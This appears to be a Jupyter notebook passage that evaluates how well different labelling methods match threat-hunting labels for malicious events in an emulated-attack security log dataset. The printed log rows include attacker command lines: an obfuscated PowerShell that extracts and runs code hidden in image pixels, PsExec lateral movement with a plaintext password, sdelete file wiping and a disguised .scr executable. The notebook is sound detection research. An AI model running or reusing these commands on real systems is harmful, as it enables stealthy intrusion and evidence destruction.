     'cohen_kappa': [np.nan,
                     cohen_kappa_score(df_label['THE_Binary'], df_label['TP_Binary']),
                     cohen_kappa_score(df_label['THE_Binary'], df_label['TWB_Binary']),
                     cohen_kappa_score(df_label['THE_Binary'], df_label['TWM_THE_Binary']),
                     cohen_kappa_score(df_label['THE_Binary'], df_label['G1_Binary'])
                    ],
     'accuracy': [np.nan,
                  accuracy_score(df_label['THE_Binary'], df_label['TP_Binary']),
                  accuracy_score(df_label['THE_Binary'], df_label['TWB_Binary']),
                  accuracy_score(df_label['THE_Binary'], df_label['TWM_THE_Binary']),
                  accuracy_score(df_label['THE_Binary'], df_label['G1_Binary']),
                  ],
     'f1-score': [np.nan,
                  f1_score(df_label['THE_Binary'], df_label['TP_Binary']),
                  f1_score(df_label['THE_Binary'], df_label['TWB_Binary']),
                  f1_score(df_label['THE_Binary'], df_label['TWM_THE_Binary']),
                  f1_score(df_label['THE_Binary'], df_label['G1_Binary']),
                 ]
    }
df = pd.DataFrame(data=d)
df

,Label,fraction_malicious,cohen_kappa,accuracy,f1-score
0,Threat Hunting Label,0.180224,NaN,NaN,NaN
1,Alert Label,0.017242,0.147815,0.837018,0.174636
2,Time Window Broad,0.446630,0.422744,0.731075,0.570993
3,Time Window Micro,0.096585,0.559117,0.818566,0.665179
4,Graph Label,0.176207,0.877156,0.964017,0.899046


In [87]:
d = {'Label': ['Alert Label', 'Time Window Broad', 'Time Window Micro', 'Threat Hunting Label'],
     'cohen_kappa': [cohen_kappa_score(df_label['G1_Binary'], df_label['TP_Binary']),
                     cohen_kappa_score(df_label['G1_Binary'], df_label['TWB_Binary']),
                     cohen_kappa_score(df_label['G1_Binary'], df_label['TWM_THE_Binary']),
                     cohen_kappa_score(df_label['G1_Binary'], df_label['THE_Binary'])
                    ],
     'accuracy': [accuracy_score(df_label['G1_Binary'], df_label['TP_Binary']),
                  accuracy_score(df_label['G1_Binary'], df_label['TWB_Binary']),
                  accuracy_score(df_label['G1_Binary'], df_label['TWM_THE_Binary']),
                  accuracy_score(df_label['G1_Binary'], df_label['THE_Binary']),
                  ],
     'f1-score': [f1_score(df_label['G1_Binary'], df_label['TP_Binary']),
                  f1_score(df_label['G1_Binary'], df_label['TWB_Binary']),
                  f1_score(df_label['G1_Binary'], df_label['TWM_THE_Binary']),
                  f1_score(df_label['G1_Binary'], df_label['THE_Binary']),
                 ]
    }
df = pd.DataFrame(data=d)
df

,Label,cohen_kappa,accuracy,f1-score
0,Alert Label,-0.026479,0.807666,0.005764
1,Time Window Broad,0.388621,0.715441,0.543124
2,Time Window Micro,0.509616,0.798741,0.625818
3,Threat Hunting Label,0.877156,0.964017,0.899046


In [88]:
df_label['G1_Binary'].value_counts()

False    165500
True      35400
Name: G1_Binary, dtype: int64

In [89]:
df_label['THE_Binary'].value_counts()

False    164693
True      36207
Name: THE_Binary, dtype: int64

In [90]:
len(df_label.loc[(df_label.G1_Binary == True) & (df_label.THE_Binary == False)])

3211

In [91]:
len(df_label.loc[(df_label.G1_Binary == False) & (df_label.THE_Binary == True)])

4018

In [92]:
df_label.loc[(df_label.G1_Binary == False) & 
             (df_label.THE_Binary == True) & 
             (df_label.CommandLine.notna()) & 
             (df_label.ProcessGuid.notna())][['ProcessGuid', 'Hostname', 'CommandLine']]

,ProcessGuid,Hostname,CommandLine
41375,{47ab858c-e442-5eac-ed03-000000000400},SCRANTON.dmevals.local,"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 192.168.0.4 http://192.168.0.4/webdav"
80262,{5aa8ec29-e52e-5eac-6b03-000000000400},NASHUA.dmevals.local,"""C:\Windows\Temp\python.exe"""
83938,{47ab858c-e49f-5eac-f103-000000000400},SCRANTON.dmevals.local,"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 192.168.0.4 http://192.168.0.4/webdav"
85882,{5aa8ec29-e56d-5eac-6e03-000000000400},NASHUA.dmevals.local,"""C:\Windows\Temp\python.exe"""
146429,{47ab858c-e49e-5eac-ef03-000000000400},SCRANTON.dmevals.local,"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 192.168.0.4 http://192.168.0.4/webdav"
149428,{47ab858c-e49f-5eac-f003-000000000400},SCRANTON.dmevals.local,"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 192.168.0.4 http://192.168.0.4/webdav"
162243,{47ab858c-e442-5eac-ec03-000000000400},SCRANTON.dmevals.local,"rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 192.168.0.4 http://192.168.0.4/webdav"
196722,{5aa8ec29-e4ec-5eac-6803-000000000400},NASHUA.dmevals.local,"""C:\Windows\Temp\python.exe"""


In [93]:
df_label.loc[(df_label.G1_Binary == False) & 
             (df_label.THE_Binary == True) & 
             (df_label['@system'].notna())]

,@timestamp,@version,Category,Channel,EventID,EventReceivedTime,EventTime,EventType,ExecutionProcessID,Hostname,IpAddress,IpPort,Keywords,LogonGuid,Message,Opcode,OpcodeValue,ProviderGuid,RecordNumber,ServiceName,ServiceSid,Severity,SeverityValue,SourceModuleName,SourceModuleType,SourceName,Status,TargetDomainName,TargetUserName,Task,ThreadID,TicketEncryptionType,TicketOptions,TransmittedServices,Version,host,port,tags,TP_Label,Action,ActivityID,CalloutKey,CalloutName,ChangeType,Conditions,FilterId,FilterKey,FilterName,FilterType,LayerId,LayerKey,LayerName,ProcessId,ProviderKey,ProviderName,UserName,UserSid,Weight,AccessList,AccessMask,AccessReason,HandleId,ObjectName,ObjectServer,ObjectType,PrivilegeList,ProcessName,ResourceAttributes,RestrictedSidCount,SubjectDomainName,SubjectLogonId,SubjectUserName,SubjectUserSid,TransactionId,ShareLocalPath,ShareName,RelativeTargetName,CommandLine,MandatoryLabel,NewProcessId,NewProcessName,ParentProcessName,TargetLogonId,TargetUserSid,TokenElevationType,Service,DisabledPrivilegeList,EnabledPrivilegeList,CallerProcessId,CallerProcessName,TargetSid,AuthenticationPackageName,ElevatedToken,ImpersonationLevel,KeyLength,LmPackageName,LogonProcessName,LogonType,RestrictedAdminMode,TargetLinkedLogonId,TargetOutboundDomainName,TargetOutboundUserName,VirtualAccount,WorkstationName,SourceHandleId,SourceProcessId,TargetHandleId,TargetProcessId,AccountName,AccountType,ContextInfo,Domain,Payload,UserID,NewThreadId,RuleName,SourceImage,SourceProcessGuid,StartAddress,StartFunction,StartModule,TargetImage,TargetProcessGuid,UtcTime,MessageNumber,MessageTotal,Path,ScriptBlockId,ScriptBlockText,AlgorithmName,KeyName,KeyType,Operation,ReturnCode,Archived,Hashes,Image,IsExecutable,ProcessGuid,TargetFilename,User,CreationUtcTime,Company,Description,FileVersion,ImageLoaded,OriginalFileName,Product,Signature,SignatureStatus,Signed,DestinationHostname,DestinationIp,DestinationIsIpv6,DestinationPort,DestinationPortName,Initiated,Protocol,SourceHostname,SourceIp,SourceIsIpv6,SourcePort,SourcePortName,NewSd,OldSd,PipeName,CurrentDirectory,IntegrityLevel,LogonId,ParentCommandLine,ParentImage,ParentProcessGuid,ParentProcessId,TerminalSessionId,CallTrace,GrantedAccess,SourceProcessGUID,SourceThreadId,TargetProcessGUID,Device,TargetObject,Details,Application,FilterRTID,LayerRTID,SourceAddress,DestAddress,DestPort,Direction,RemoteMachineID,RemoteUserID,BootMenuPolicy,NewValue,NewValueType,ObjectValueName,OldValue,OldValueType,OperationType,ProfileUsed,RuleId,QueryName,QueryResults,QueryStatus,PreviousCreationUtcTime,EventCountTotal,EventIdx,GroupMembership,param1,Properties,Hash,PreAuthType,ClientProcessId,CountOfCredentialsReturned,ProcessCreationTime,ReadOperation,TargetName,Type,CalloutId,CalloutType,CorruptionActionState,DeviceName,DriveName,Config,IsTestConfig,DirtyPages,HiveName,HiveNameLength,KeysUpdated,PackageName,Workstation,DeviceNameLength,DeviceTime,DeviceVersionMajor,DeviceVersionMinor,FinalStatus,UserData,ServiceAccount,ServiceFileName,ServiceStartType,ServiceType,param10,param11,param2,param3,param4,param5,param6,param7,param8,param9,...,LocalOnlyMapped,LooseSourceMapped,ModifyingApplication,ModifyingUser,Origin,Profiles,RemoteAddresses,RuleStatus,SchemaVersion,SecurityOptions,CountNew,CountOld,EnabledNew,UpdateReason,NewTime,PreviousTime,NotificationPackageName,ShutdownActionType,ShutdownEventCode,ShutdownReason,BootMode,BuildVersion,MajorVersion,MinorVersion,QfeVersion,ServiceVersion,StartTime,EnableDisableReason,VsmPolicy,DCName,ProcessingMode,ProcessingTimeInMilliseconds,SupportInfo1,SupportInfo2,Group,IdleImplementation,IdleStateCount,MaximumPerformancePercent,MinimumPerformancePercent,MinimumThrottlePercent,NominalFrequency,Number,PerformanceImplementation,StopTime,FileName,LinkName,AdvancedOptions,ConfigAccessPolicy,DisableIntegrityChecks,FlightSigning,HypervisorDebug,HypervisorLaunchType,HypervisorLoadOptions,KernelDebug,RemoteEventLogging,TestSigning,VsmLaunchType,TSId,BootStatusPolicy,LastBootGoo

In [94]:
df_label.loc[(df_label.G1_Binary == True) & 
             (df_label.THE_Binary == False) & 
             (df_label['@system'].notna())]

,@timestamp,@version,Category,Channel,EventID,EventReceivedTime,EventTime,EventType,ExecutionProcessID,Hostname,IpAddress,IpPort,Keywords,LogonGuid,Message,Opcode,OpcodeValue,ProviderGuid,RecordNumber,ServiceName,ServiceSid,Severity,SeverityValue,SourceModuleName,SourceModuleType,SourceName,Status,TargetDomainName,TargetUserName,Task,ThreadID,TicketEncryptionType,TicketOptions,TransmittedServices,Version,host,port,tags,TP_Label,Action,ActivityID,CalloutKey,CalloutName,ChangeType,Conditions,FilterId,FilterKey,FilterName,FilterType,LayerId,LayerKey,LayerName,ProcessId,ProviderKey,ProviderName,UserName,UserSid,Weight,AccessList,AccessMask,AccessReason,HandleId,ObjectName,ObjectServer,ObjectType,PrivilegeList,ProcessName,ResourceAttributes,RestrictedSidCount,SubjectDomainName,SubjectLogonId,SubjectUserName,SubjectUserSid,TransactionId,ShareLocalPath,ShareName,RelativeTargetName,CommandLine,MandatoryLabel,NewProcessId,NewProcessName,ParentProcessName,TargetLogonId,TargetUserSid,TokenElevationType,Service,DisabledPrivilegeList,EnabledPrivilegeList,CallerProcessId,CallerProcessName,TargetSid,AuthenticationPackageName,ElevatedToken,ImpersonationLevel,KeyLength,LmPackageName,LogonProcessName,LogonType,RestrictedAdminMode,TargetLinkedLogonId,TargetOutboundDomainName,TargetOutboundUserName,VirtualAccount,WorkstationName,SourceHandleId,SourceProcessId,TargetHandleId,TargetProcessId,AccountName,AccountType,ContextInfo,Domain,Payload,UserID,NewThreadId,RuleName,SourceImage,SourceProcessGuid,StartAddress,StartFunction,StartModule,TargetImage,TargetProcessGuid,UtcTime,MessageNumber,MessageTotal,Path,ScriptBlockId,ScriptBlockText,AlgorithmName,KeyName,KeyType,Operation,ReturnCode,Archived,Hashes,Image,IsExecutable,ProcessGuid,TargetFilename,User,CreationUtcTime,Company,Description,FileVersion,ImageLoaded,OriginalFileName,Product,Signature,SignatureStatus,Signed,DestinationHostname,DestinationIp,DestinationIsIpv6,DestinationPort,DestinationPortName,Initiated,Protocol,SourceHostname,SourceIp,SourceIsIpv6,SourcePort,SourcePortName,NewSd,OldSd,PipeName,CurrentDirectory,IntegrityLevel,LogonId,ParentCommandLine,ParentImage,ParentProcessGuid,ParentProcessId,TerminalSessionId,CallTrace,GrantedAccess,SourceProcessGUID,SourceThreadId,TargetProcessGUID,Device,TargetObject,Details,Application,FilterRTID,LayerRTID,SourceAddress,DestAddress,DestPort,Direction,RemoteMachineID,RemoteUserID,BootMenuPolicy,NewValue,NewValueType,ObjectValueName,OldValue,OldValueType,OperationType,ProfileUsed,RuleId,QueryName,QueryResults,QueryStatus,PreviousCreationUtcTime,EventCountTotal,EventIdx,GroupMembership,param1,Properties,Hash,PreAuthType,ClientProcessId,CountOfCredentialsReturned,ProcessCreationTime,ReadOperation,TargetName,Type,CalloutId,CalloutType,CorruptionActionState,DeviceName,DriveName,Config,IsTestConfig,DirtyPages,HiveName,HiveNameLength,KeysUpdated,PackageName,Workstation,DeviceNameLength,DeviceTime,DeviceVersionMajor,DeviceVersionMinor,FinalStatus,UserData,ServiceAccount,ServiceFileName,ServiceStartType,ServiceType,param10,param11,param2,param3,param4,param5,param6,param7,param8,param9,...,LocalOnlyMapped,LooseSourceMapped,ModifyingApplication,ModifyingUser,Origin,Profiles,RemoteAddresses,RuleStatus,SchemaVersion,SecurityOptions,CountNew,CountOld,EnabledNew,UpdateReason,NewTime,PreviousTime,NotificationPackageName,ShutdownActionType,ShutdownEventCode,ShutdownReason,BootMode,BuildVersion,MajorVersion,MinorVersion,QfeVersion,ServiceVersion,StartTime,EnableDisableReason,VsmPolicy,DCName,ProcessingMode,ProcessingTimeInMilliseconds,SupportInfo1,SupportInfo2,Group,IdleImplementation,IdleStateCount,MaximumPerformancePercent,MinimumPerformancePercent,MinimumThrottlePercent,NominalFrequency,Number,PerformanceImplementation,StopTime,FileName,LinkName,AdvancedOptions,ConfigAccessPolicy,DisableIntegrityChecks,FlightSigning,HypervisorDebug,HypervisorLaunchType,HypervisorLoadOptions,KernelDebug,RemoteEventLogging,TestSigning,VsmLaunchType,TSId,BootStatusPolicy,LastBootGoo

In [95]:
df_label.loc[(df_label.THE_Binary == True) & 
             (df_label['@system'].notna())]

,@timestamp,@version,Category,Channel,EventID,EventReceivedTime,EventTime,EventType,ExecutionProcessID,Hostname,IpAddress,IpPort,Keywords,LogonGuid,Message,Opcode,OpcodeValue,ProviderGuid,RecordNumber,ServiceName,ServiceSid,Severity,SeverityValue,SourceModuleName,SourceModuleType,SourceName,Status,TargetDomainName,TargetUserName,Task,ThreadID,TicketEncryptionType,TicketOptions,TransmittedServices,Version,host,port,tags,TP_Label,Action,ActivityID,CalloutKey,CalloutName,ChangeType,Conditions,FilterId,FilterKey,FilterName,FilterType,LayerId,LayerKey,LayerName,ProcessId,ProviderKey,ProviderName,UserName,UserSid,Weight,AccessList,AccessMask,AccessReason,HandleId,ObjectName,ObjectServer,ObjectType,PrivilegeList,ProcessName,ResourceAttributes,RestrictedSidCount,SubjectDomainName,SubjectLogonId,SubjectUserName,SubjectUserSid,TransactionId,ShareLocalPath,ShareName,RelativeTargetName,CommandLine,MandatoryLabel,NewProcessId,NewProcessName,ParentProcessName,TargetLogonId,TargetUserSid,TokenElevationType,Service,DisabledPrivilegeList,EnabledPrivilegeList,CallerProcessId,CallerProcessName,TargetSid,AuthenticationPackageName,ElevatedToken,ImpersonationLevel,KeyLength,LmPackageName,LogonProcessName,LogonType,RestrictedAdminMode,TargetLinkedLogonId,TargetOutboundDomainName,TargetOutboundUserName,VirtualAccount,WorkstationName,SourceHandleId,SourceProcessId,TargetHandleId,TargetProcessId,AccountName,AccountType,ContextInfo,Domain,Payload,UserID,NewThreadId,RuleName,SourceImage,SourceProcessGuid,StartAddress,StartFunction,StartModule,TargetImage,TargetProcessGuid,UtcTime,MessageNumber,MessageTotal,Path,ScriptBlockId,ScriptBlockText,AlgorithmName,KeyName,KeyType,Operation,ReturnCode,Archived,Hashes,Image,IsExecutable,ProcessGuid,TargetFilename,User,CreationUtcTime,Company,Description,FileVersion,ImageLoaded,OriginalFileName,Product,Signature,SignatureStatus,Signed,DestinationHostname,DestinationIp,DestinationIsIpv6,DestinationPort,DestinationPortName,Initiated,Protocol,SourceHostname,SourceIp,SourceIsIpv6,SourcePort,SourcePortName,NewSd,OldSd,PipeName,CurrentDirectory,IntegrityLevel,LogonId,ParentCommandLine,ParentImage,ParentProcessGuid,ParentProcessId,TerminalSessionId,CallTrace,GrantedAccess,SourceProcessGUID,SourceThreadId,TargetProcessGUID,Device,TargetObject,Details,Application,FilterRTID,LayerRTID,SourceAddress,DestAddress,DestPort,Direction,RemoteMachineID,RemoteUserID,BootMenuPolicy,NewValue,NewValueType,ObjectValueName,OldValue,OldValueType,OperationType,ProfileUsed,RuleId,QueryName,QueryResults,QueryStatus,PreviousCreationUtcTime,EventCountTotal,EventIdx,GroupMembership,param1,Properties,Hash,PreAuthType,ClientProcessId,CountOfCredentialsReturned,ProcessCreationTime,ReadOperation,TargetName,Type,CalloutId,CalloutType,CorruptionActionState,DeviceName,DriveName,Config,IsTestConfig,DirtyPages,HiveName,HiveNameLength,KeysUpdated,PackageName,Workstation,DeviceNameLength,DeviceTime,DeviceVersionMajor,DeviceVersionMinor,FinalStatus,UserData,ServiceAccount,ServiceFileName,ServiceStartType,ServiceType,param10,param11,param2,param3,param4,param5,param6,param7,param8,param9,...,LocalOnlyMapped,LooseSourceMapped,ModifyingApplication,ModifyingUser,Origin,Profiles,RemoteAddresses,RuleStatus,SchemaVersion,SecurityOptions,CountNew,CountOld,EnabledNew,UpdateReason,NewTime,PreviousTime,NotificationPackageName,ShutdownActionType,ShutdownEventCode,ShutdownReason,BootMode,BuildVersion,MajorVersion,MinorVersion,QfeVersion,ServiceVersion,StartTime,EnableDisableReason,VsmPolicy,DCName,ProcessingMode,ProcessingTimeInMilliseconds,SupportInfo1,SupportInfo2,Group,IdleImplementation,IdleStateCount,MaximumPerformancePercent,MinimumPerformancePercent,MinimumThrottlePercent,NominalFrequency,Number,PerformanceImplementation,StopTime,FileName,LinkName,AdvancedOptions,ConfigAccessPolicy,DisableIntegrityChecks,FlightSigning,HypervisorDebug,HypervisorLaunchType,HypervisorLoadOptions,KernelDebug,RemoteEventLogging,TestSigning,VsmLaunchType,TSId,BootStatusPolicy,LastBootGoo

In [96]:
len(df_label.loc[(df_label.G1_Binary == True) & 
             (df_label.THE_Binary == False) & 
             (df_label.CommandLine.notna()) & 
             (df_label.ProcessGuid.notna())][['ProcessGuid', 'Hostname', 'CommandLine']])

26

In [97]:
df_label.loc[(df_label.G1_Binary == True) & 
             (df_label.THE_Binary == False) & 
             (df_label.CommandLine.notna()) & 
             (df_label.ProcessGuid.notna())][['ProcessGuid', 'Hostname', 'CommandLine']]

,ProcessGuid,Hostname,CommandLine
12975,{47ab858c-e374-5eac-d903-000000000400},SCRANTON.dmevals.local,\??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1
22485,{47ab858c-e684-5eac-ff03-000000000400},SCRANTON.dmevals.local,C:\windows\system32\svchost.exe -k appmodel -p -s camsvc
26578,{47ab858c-e519-5eac-f403-000000000400},SCRANTON.dmevals.local,"""C:\Program Files\SysinternalsSuite\PsExec64.exe"" -accepteula \\NASHUA -u dmevals\pbeesly -p Fl0nk3rt0n!T0by -i 2 C:\Windows\Temp\python.exe"
38237,{47ab858c-e1e3-5eac-b503-000000000400},SCRANTON.dmevals.local,"""C:\windows\system32\sdclt.exe"""
58110,{47ab858c-e70a-5eac-af00-000000000500},SCRANTON.dmevals.local,"%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16"
63799,{47ab858c-e1e5-5eac-bb03-000000000400},SCRANTON.dmevals.local,"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\pbeesly\AppData\Local\Temp\RES2758.tmp"" ""c:\Users\pbeesly\AppData\Local\Temp\qkbkqqbs\CSC6B76613243A54474837EBEC19BC0E56A.TMP"""
73611,{47ab858c-e413-5eac-e903-000000000400},SCRANTON.dmevals.local,"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\pbeesly\AppData\Local\Temp\RESAB37.tmp"" ""c:\Users\pbeesly\AppData\Local\Temp\0piklvia\CSC8FB4597E15924B708420DCB4F6EA7BB.TMP"""
88067,{47ab858c-e188-5eac-af03-000000000400},SCRANTON.dmevals.local,\\?\C:\windows\system32\conhost.exe --headless --width 80 --height 25 --signal 0x474 --server 0x50c
91568,{47ab858c-e6b2-5eac-5900-000000000500},SCRANTON.dmevals.local,rundll32.exe
104058,{47ab858c-e394-5eac-e303-000000000400},SCRANTON.dmevals.local,\??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1


In [98]:
df_label.shape

(200900, 566)

In [99]:
len(df_label.loc[df_label.TP_Binary == True])

3464

In [100]:
3464 / 200900

0.017242409158785464

In [101]:
len(df_label.loc[df_label.G1_Binary == True])

35400

In [102]:
len(df_label.loc[df_label.THE_Binary == True])

36207

In [103]:
35400/200900

0.17620706819313092

In [104]:
36207/200900

0.18022399203583872

In [105]:
len(df_label.loc[df_label.TWB_Binary == True])

89728

In [106]:
89728/200900

0.4466301642608263

In [107]:
len(df_label.loc[df_label.TWM_Binary == True])

19404

In [108]:
len(df_label.loc[(df_label['EventID']==1) | (df_label['EventID']==3) | (df_label['EventID']==11)]) / len(df_label)

0.016590343454454953

In [109]:
df_label.loc[((df_label['id_orig_h'].notna()))].sort_values('time_stamp').groupby(['TP_Binary', 'Source_IP', 'Destination_IP'])['time_stamp'].agg(['first','last', 'count'])

first  \
TP_Binary Source_IP Destination_IP                                       
False     10.0.1.4  10.0.0.4       2020-04-30 00:06:38.899709940+00:00   
                    10.0.1.255     2020-04-30 00:09:01.189415932+00:00   
                    10.0.1.6       2020-04-30 00:35:25.606390953+00:00   
                    192.168.0.4    2020-04-30 00:32:14.891381979+00:00   
          10.0.1.6  10.0.0.4       2020-04-30 00:06:39.824369907+00:00   
                    10.0.1.255     2020-04-30 00:08:43.385543108+00:00   
                    192.168.0.4    2020-04-30 00:40:44.730953932+00:00   
True      10.0.1.4  10.0.0.4       2020-04-30 00:12:00.847908020+00:00   
                    10.0.1.6       2020-04-30 00:33:26.283442020+00:00   
                    192.168.0.5    2020-04-30 00:08:02.361653090+00:00   

                                                                  last  count  
TP_Binary Source_IP Destination_IP                                             
False     10.0.1.4  10.0.0.4       2020-04-30 00:43:58.389343023+00:00    179  
                    10.0.1.255     2020-04-30 00:45:00.760719061+00:00      8  
                    10.0.1.6       2020-04-30 00:45:00.056051970+00:00    104  
                    192.168.0.4    2020-04-30 00:35:25.658109903+00:00     78  
          10.0.1.6  10.0.0.4       2020-04-30 00:43:59.015400887+00:00    148  
                    10.0.1.255     2020-04-30 00:44:42.662991047+00:00      8  
                    192.168.0.4    2020-04-30 00:44:44.752271891+00:00    753  
True      10.0.1.4  10.0.0.4       2020-04-30 00:35:04.410170078+00:00     12  
                    10.0.1.6       2020-04-30 00:33:29.289120913+00:00      8  
                    192.168.0.5    2020-04-30 00:15:18.751499891+00:00      6

In [110]:
df_label.loc[((df_label['EventID'].notna()))].sort_values('time_stamp').groupby(['TP_Binary'])['time_stamp'].agg(['first','last', 'count'])

,first,last,count
TP_Binary,,,
False,2020-05-02 02:55:26.493000+00:00,2020-05-02 03:28:20.170000+00:00,195322
True,2020-05-02 02:55:57.730000+00:00,2020-05-02 03:19:53.189000+00:00,3438


In [111]:
df_label.shape

(200900, 566)

In [112]:
200900 * 566

113709400

In [113]:
100702518 / 113709400

0.8856129572401227

In [115]:
df_label.loc[(df_label.G1_Binary==True) & (df_label.CommandLine.notna())][['CommandLine']]

,CommandLine
42,"""C:\Program Files\SysinternalsSuite\sdelete64.exe"" /accepteula C:\Users\pbeesly\AppData\Roaming\Draft.Zip"
1334,".\sdelete64.exe /accepteula ""C:\Users\pbeesly\Desktop\working.zip"""
2022,"""PowerShell.exe"" -noni -noexit -ep bypass -window hidden -c ""sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"""
2920,"""C:\Windows\Temp\Rar.exe"" a -hpfGzq5yKw C:\Users\pbeesly\Desktop\working.zip C:\Users\pbeesly\AppData\Roaming\working.zip"
3964,powershell.exe
...,...
179251,"""C:\ProgramData\victim\â€®cod.3aka3.scr"" /S"
180127,".\sdelete64.exe /accepteula ""C:\Users\pbeesly\AppData\Roaming\working.zip"""
181719,"""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\pbeesly\AppData\Local\Temp\qkbkqqbs\qkbkqqbs.cmdline"""
183813,"""C:\windows\system32\sdclt.exe"""


In [117]:
df_label.loc[(df_label.G1_Binary == True) & 
             (df_label.CommandLine.notna()) & 
             (df_label.ProcessGuid.notna())][['CommandLine']]

,CommandLine
1334,".\sdelete64.exe /accepteula ""C:\Users\pbeesly\Desktop\working.zip"""
8974,"""C:\Program Files\SysinternalsSuite\accesschk.exe"""
12975,\??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1
14768,powershell.exe
16602,C:\WindowsAzure\WindowsAzureNetAgent_1.0.0.143\WindowsAzureNetAgent\WindowsAzureNetAgent.exe
18627,"""C:\Windows\Temp\python.exe"""
22485,C:\windows\system32\svchost.exe -k appmodel -p -s camsvc
26578,"""C:\Program Files\SysinternalsSuite\PsExec64.exe"" -accepteula \\NASHUA -u dmevals\pbeesly -p Fl0nk3rt0n!T0by -i 2 C:\Windows\Temp\python.exe"
38237,"""C:\windows\system32\sdclt.exe"""
39393,"""C:\Program Files\SysinternalsSuite\sdelete64.exe"" /accepteula C:\Users\pbeesly\AppData\Roaming\Draft.Zip"
